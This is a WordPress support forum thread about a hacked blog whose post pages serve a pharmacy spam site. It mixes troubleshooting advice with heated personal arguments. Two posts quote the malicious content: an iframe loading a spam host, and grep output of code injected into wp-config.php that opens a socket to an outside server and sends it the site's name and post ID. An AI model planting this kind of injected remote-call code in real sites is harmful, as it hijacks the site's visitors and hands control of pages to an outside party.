[resolved] is this some new spam attack? (36 posts)

  1. nothingHappens
    Posted 8 years ago #

    I've been looking through the forums, googling my butt off, and can't find anything that describes what I'm experiencing. And I need help getting rid of it.

    A while back one of my posts got compromised with spam -- not in the form of a comment, or the post itself being edited, but rather this: the posts showed up normally on home page, but when you click a post title to go to the individual post (say, to leave a comment) you get a spam page. Not a bunch of spam links inserted into the post/page content, mind you, but a completely different web page hawking cheap drugs. However the URL is still the same URL as normal to view the post. This doesn't start happening up right away after publishing the post, but some time a little later.

    The first time it happened, I figured it for a one-off deal, and promptly deleted the post and just copied its contents into a new post. But yesterday it happened again, so I thought I'd better take new measures.

    First, I was long overdue for an upgrade anyway (was still using WordPress 2.0) so I installed the automatic upgrade plugin and upgraded to the latest. Then I changed my user password and ssh/ftp password at my web host. Then I posted to the blog saying, in effect, "sorry about the spam thing, but I went ahead and did this and this and hopefully it won't happen again."

    This morning I find out it happened again -- to that very post:

    http://nothinghappens.net -- the home page, post looks normal
    http://nothinghappens.net/?p=316 -- holy crap wtf

    Here are some more interesting details I've dug up: If you add a trailing / to the URL you get the post again instead of the spam site. Check it out: http://nothinghappens.net/?p=316/ However, before you tell me to check my .htaccess -- I don't have one. Also, I looked at the post's record in the database via phpMyAdmin and nothing's been done to it there.

  2. RosieMBanks
    Posted 8 years ago #

    Read these:

    Security Issue, Multiple Sites

    (Scroll down to Ultrasonic's post -- he'll tell you how to check for a ghost user that may have been added to your database.)

    Has Your WordPress Been Hacked Recently?

    Weird and Dangerous : ro8kfbsmag.txt

    As far as I understand, this kind of attack is the result of running an old version of WordPress. It will also get you delisted from Google.

    And goodness, I think you win the prize for running the oldest version of WP that I've seen so far:

    <meta name="generator" content="WordPress 1.2" /> <!-- leave this for stats -->

  3. nothingHappens
    Posted 8 years ago #

    That meta tag must be incorrect, I was using WordPress 2.0 until last night when I upgraded to 2.5.1 -- as I just said in my original post. If you won't bother reading it, I can't imagine your input will be much help, since you're probably giving me stock info without bothering to look at the specifics of my issue as explained... but I'll check out those links anyway.

  4. nothingHappens
    Posted 8 years ago #

    RosieMBanks, that meta tag was hard-coded into the theme I'm using, I've changed it now to use the $wp_version variable.

    For the rest of you, please read carefully before "helping" thanks.

  5. Joni
    Posted 8 years ago #

    Well since the attack happened prior to the upgrade, the rogue user info was already in the database. One big fat reason to upgrade. And .. although it's too late now, I should mention for the benefit of any other readers on a very old (pre 2.0) version of WP, you CAN upgrade to 2.0.11, which is the only other supported, secure version of WP out there. :)

    But for you, Chuck, I guess you should dive into those database tables and locate and kill that other user. Provided he/she doesn't show up on your User panel in the dashboard. Good luck. And beware the Grues. ;)

  6. nothingHappens
    Posted 8 years ago #

    I've looked at the database in phpmyadmin, there is only the one user (admin) in it, and I changed its password immediately after upgrading to 2.5.1 last night. Also mentioned in my original post. Thanks, though.

  7. Ivovic
    Posted 8 years ago #

    You seem hell bent on people dutifully taking in the details of your post.

    Being as studious as you are, you must absolutely be kicking yourself at your own laziness and arrogance which allowed you the delusion that somehow security updates weren't necessary for you.

    God that must really hurt right now.

    (by the way, I read about that in your original post)

    I'm not sure what you'd have us do for you now, though. If you happen to invent a time machine let us know. I'll be sure to read that post in intimate detail.

    In the mean time, unless you're busy wiping *everything* from your hosting space and reloading fresh copies of (again) *everything* including wordpress, themes and plugins, may I suggest you start there?

    Leave no file behind... but do backup any media contained in your posts.

  8. Rove
    Posted 8 years ago #

    Also, your page that looks normal also contains lots of hidden links in both the header and footer. Although you have upgraded now to the most recent version, there a still one or more files that are hacked.

    Best advice is what Ivovic gave you: delete everything and reinstall everything from a clean source.

  9. nothingHappens
    Posted 8 years ago #

    Well you know, every thing I've read that contains suggestions about proper etiquette for posting to a support forum says to be specific and include details. So it's frustrating when I take pains to do so, and people ignore them. If you're not going to pay any attention to the information I'm providing to help diagnose the issue, don't waste both of our time. And ffs don't waste your own time replying just to try to bitch me out. Go do something productive.

    As I've pointed out, I made a long-overdue upgrade from 2.0 (NOT 1.2, that meta tag was hard-coded into a theme file and hence erroneous) to 2.5.1 last night. Until then, the labor involved in doing an upgrade was the main thing keeping me from not doing it sooner, until I found the automatic upgrade plugin -- kudos to the fine folks who came up with that! As you probably know, the upgrade overwrites pretty much every WordPress file with the new versions, so it's not far off from a complete reinstall. Images, media, and themes obviously are left alone.

    Immediately after doing the upgrade, I changed my user account password in WordPress and also my FTP/SSH password. But I repeat myself yet again. Shortly after doing this, the same spam-attack was made yet again.

    Yeah, if I had lots of time on my hands, I could wipe every single file as you suggest, but I thought maybe someone here would be able to help me narrow things down a bit so I could maybe focus on certain files and approach this in an efficient manner rather than a hack-and-slash one.

    Anyway I'm going to go have a look at the files in my theme.

  10. Ivovic
    Posted 8 years ago #

    And ffs don't waste your own time replying just to try to bitch me out.

    Well actually, I did offer you the only course of action likely to lead to a solution.

    Yeah, if I had lots of time on my hands, I could wipe every single file as you suggest, but I thought maybe someone here would be able to help me narrow things down a bit so I could maybe focus on certain files and approach this in an efficient...

    It's far more time-efficient and effective to stamp out your problem, than it is to waffle around and squawk about alternatives which do not exist.

    Immediately after doing the upgrade, I changed my user account password in WordPress and also my FTP/SSH password. But I repeat myself yet again. Shortly after doing this, the same spam-attack was made yet again.

    let me see if I can be ultra-specific for you, since now you're the one having trouble reading what's been written for you..

    you didn't get rid of the back door they left for themselves, therefore they were able to enter at their leisure

    If you don't get rid of EVERYTHING in your hosting space, how will you know that they haven't simply added some code to any of the php files you have uploaded there?

    Do you want to read them all? I sure as feh don't.

    rather than a hack-and-slash one

    I told you to nuke it from orbit... you're the one hell bent on hacking and slashing and ignoring the only effective advice you're going to get.

    Want help? there it is (again)... don't like it? not what you want to hear?... well, I can't tell you how deeply upset that's going to make me.

  11. Joni
    Posted 8 years ago #

    Yep, this has gone beyond just "Oops, I really should get off my duff and upgrade so I don't get hacked." It's too late for that now. Now you go into damage control and, unfortunately, that means that all the files on your server are suspect. But if you keep backups of your things on your hard drive (you do, don't you?), it's not that big a deal to just restore fresh files either from a known good back up (your server log files should give clues as to when the breach occurred) or from uncompromised files residing on your hard drive.

    A PITA, you bet. Upgrading on a regular basis seems like a walk in the park compared to that now, huh? Nothing learned like something learned the hard way. The end result, tho, should be that you'll have a solid WP install. But as I've said many times over on this forum and elsewhere, you are only as secure as the most lazy, security-lax person sharing your server space. So plan around those idiots by keeping your software updated regularly.

    "If you don't have enough time to do it right, when are you going to have time to do it over?"

  12. nothingHappens
    Posted 8 years ago #

    Here's the thing: I'm not entirely convinced that this paticular attack involves changing any of WordPress's PHP files directly. The weird behavior described where the post shows up normally if you add a trailing / to the URL seems to suggest there's something else at work here, as does this: the spam page is still given by URLS that point to posts that I have deleted; also the upgrade I did last night should have replaced all WordPress's own code with new files anyway... at least, the automatic upgrade plugin claimed it was doing so.

    If a specific PHP file has been modified however, a bit of exploration might turn up which specific file(s). Thus my main purpose in posting here was in hopes that someone has seen had specific problem before, and had found the PHP file, or whatever else (database record, .htaccess, theme files, etc) that had been changed and could point me to it.

    Wiping out and reinstalling Every. Single. File. will take a considerable amount of time, so I was hoping to leave it as a last resort, and start by seeing if I could find anyone that could narrow things down.

    See I program for a living. I don't rewrite my entire code base from scratch every time there's a bug. I'd never make a living that way. I try to find exactly where the bug is first. So this is just my natural approach to a problem like this.

    If you haven't seen this specific problem before and thus can't help narrow things down, then geez, just say so already. At least read enough of my description of said problem to understand what specific problem I'm having rather than just assuming it's a common one that you have a stock answer for -- in which case Google would have turned up information about already and I wouldn't be bothering to post here in the first place.

    I've deleted the spam links that had got hacked into my header and footer files, that I hadn't noticed before but were pointed out by someone actually helpful. That hasn't done away with this particular problem however.

  13. Joni
    Posted 8 years ago #

    Your problem is that you've been hacked. Unless you know how to interpret server logs, and apparently, since you program for a living, you must, the safest thing to do, to prevent further such attacks, is to upload clean files. You don't take a bath and put dirty underwear on, do you? (Sorry, Whoo, I had to!)

  14. Ivovic
    Posted 8 years ago #

    Here's the thing: I'm not entirely convinced that this paticular attack involves changing any of WordPress's PHP files directly

    I stopped reading here... he was right, I've got better things to do.

  15. nothingHappens
    Posted 8 years ago #

    Yes, you do. Please go away.
    I'm going to go look at some logs.

  16. Joni
    Posted 8 years ago #

    Whoo is gonna be so disappointed...

  17. Ivovic
    Posted 8 years ago #

    hey NH... please be big enough to come back here when you finally decide to rm -rf the whole lot. I just want to know how long it takes for an otherwise intelligent person to actually take the advice they came here asking for.

    (oh and be sure to look for perl files too, a popular choice of drop-in back doors)

    Don't say I didn't help.

  18. moshu
    Posted 8 years ago #

    YOU should read carefully all the resources offered.
    You were hacked before the upgrade, and in many cases the upgrade itself will NOT clean up the site; e.g. one of the threads referenced by Rosie mentions that the "bad files" are in the wp-content/uploads/200x/34/ and similar folders, and we all know there is no month "34" or "2" (should be 02), so watch out for those and everything else that others already figured out.

    I repeat, too: the upgrade (especially an automated one) does NOT help in itself: during an upgrade the wp-content folder is never touched... so, plenty of unchanged things could be there in different files and subfolders. I can testify that while helping a WP user in a similar situation, when he gave me access to his server, I found ALL the bad files (bad guys? :) in the wp-content folder.

    And if you took the time to read all those threads that were suggested to you by RosieBanks at the beginning - you could have saved a lot of time and bandwidth. Post less and read more.

    Good luck!

  19. nothingHappens
    Posted 8 years ago #

    I don't have a wp-content/uploads/ folder. But thanks for pointing that out, I'll have another look around wp-content. So far I've already examined the themes directory pretty closely.

    And I did read those threads, but they seemed largely to do with rather different issues than this one -- this isn't comment spam, it's displaying an entirely different page in place of the post's page.

  20. Rove
    Posted 8 years ago #

    When i look at the source of the ?p=316 page i see two interesting lines:

    <style>BODY {overflow:hidden; margin:0px;padding:0px;}</style>
    <iframe border=0 width="100%" height="100%" src="http://km23548.keymachine.de/sutra/in.cgi?default&group=farma&parameter=celebrex+delisted+in+alberta"></iframe>

    Other thing you can try is to temporarily switch to the classic theme and see if the problem is still there.

    Edit: after i wrote this i checked your page again and everything seems ok now? Did you find something?

  21. nothingHappens
    Posted 8 years ago #


    One of my readers pointed this out:

    So, I've had a couple of minutes for this, so didn't look too deeply, but there's an iframe in that HTML with the guilty party's URL in it. Googling on that turned up some links, among them this one, which might be a good place to start.

    The URL in question was something at keymachine.de -- so I figured if something has been modified, it's being modified to serve up content from keymachine.de, so the text "keymachine" is likely to be part of the inserted code. So:

    [boo]$ grep -R keymachine .
    ./wp-config.php: $sock = @fsockopen('km20725.keymachine.de', 80);
    ./wp-config.php: fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n");
    ./wp-config.php: fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");

    There's our spammer. It didn't occur to me previously that among the files the upgrade would leave alone would be wp-config.php, but that does make sense, doesn't it? Not sure how or when wp-config.php would have been compromised, could have been while moving the site from a different host (various files had their permissions temporarily changed at certain times)... but there it was. A couple minutes in vim deleting the offending slab of code and things are back to normal.

    So no, Mr. Cool-Sunglasses-Guy, I still say you didn't help. But thanks for playing.

    Now this post can sit here to be found by others in the future who find themselves with the same issue, and will save THEM hours of re-installing every single file instead of just editing one. Yay! My good deed for the day.

    This is why I'm hot. You ain't cause you not. :D

  22. Ivovic
    Posted 8 years ago #

    wow, that last line really makes me want to be your friend so much right now.

    now we wait and see how long until you get hit again.

    for the record, it's been over an hour since I first posted in this thread, and more than 3 since rosie posted.

    fresh files would have solved this for you before I even got here... happy-dance yourself into a coma if you like, but it seems you really *do* have all this spare time after all.

    See you again soon.

    Like I said, let us know when you actually do rm -rf the lot.

  23. nothingHappens
    Posted 8 years ago #

    3 hours I spent so someone else won't have to then, I guess. Three hours that were also spent tightening up my file permissions and various other helpful things to try to ward off future problems. And for the record, I don't think I ever claimed to want you as a friend.

  24. Joni
    Posted 8 years ago #

    Great news that you solved it. I'd add some keywords to this thread and mark it resolved to help others in the same bind.

  25. Ivovic
    Posted 8 years ago #

    NH I'm sorry the thought of this is so horrible for you, but there's just no way to be certain that you've cleared it up until you wipe the lot.

    Anyone reading this should consider this solution as effective as pain killers applied to a bullet wound. You may feel fine right now, but the real problem is probably still there.

    All you've done is make it less noticable.

    I can't believe how resistant you are to this. Take a moment and ask yourself "if I were hacking something and could write to files, would I stop at changing just one really easily noticable one?"

    (probably best if people don't find this and instead jump straight to a solution that doesn't rely on crossing fingers and hoping for the best - clearing out a wordpress install and reloading fresh plugins takes less than 20 minutes).

  26. nothingHappens
    Posted 8 years ago #

    Good idea. Feel free to suggest more helpful tags/keywords than I have chosen -- I added "redirect" since some folks could conceivably mistake it for something that redirects to a different site, and "post" since it "replaces" the page for viewing an individual post, but those seem awfully general...

    Ivovic: the less easily noticeable files would largely have been replaced in the upgrade. If I doubt this, I can check their timestamps. The files it leaves alone are fairly easy to deduce. I think maybe it's just that rm -rf is the only linux command you know. :D

  27. Ivovic
    Posted 8 years ago #

    you could try being less of a fscking asshole. clearly I'm still here because I'm concerned that you'll sway the minds of other like-minded lazy spectators, so if nothing else, that earns me your tolerance.

    you can't replace new files in an upgrade, genius... as someone who isn't nearly as selfish with his time as you are, I've been through enough of these things to see all kinds of additional files, modded files, hidden files, and obfuscated files.

    How many of wordpresses files can you name? done a compare with what's uploaded as compared with what's in the zip? how about your plugins, no foreign files in there?

    How the hell would you know? you haven't even looked.

    and honestly, if you did actually look at all that, then you're more of a moron than I give you credit for, since clearing it out would have been miles faster.

    for the record, it's a unix command, some of us used the command line before it became cool.

  28. moshu
    Posted 8 years ago #

    Guys, let's stop the personal remarks, and focus on the issue. Otherwise I'll be forced to delete posts and close the thread.
    Play nice...

  29. moshu
    Posted 8 years ago #

    [I told ya I am quick with the delete button!]

  30. nothingHappens
    Posted 8 years ago #

    What does anyone think of the suggestion of setting the permissions of config.php to 640? Has it been suggested before? Would it be helpful? It does contain a database connection password after all. Since my particular issue turned out to involve config.php (the header and footer in my theme were also full of spam links, but I know not whether that was from the same party), that thought occurred to me. I went ahead and chmod'd it as such. Oh, and personal attacks directed /at/ me don't warrant a delete, naturally, so flame away.

Topic Closed

This topic has been closed to new replies.

About this Topic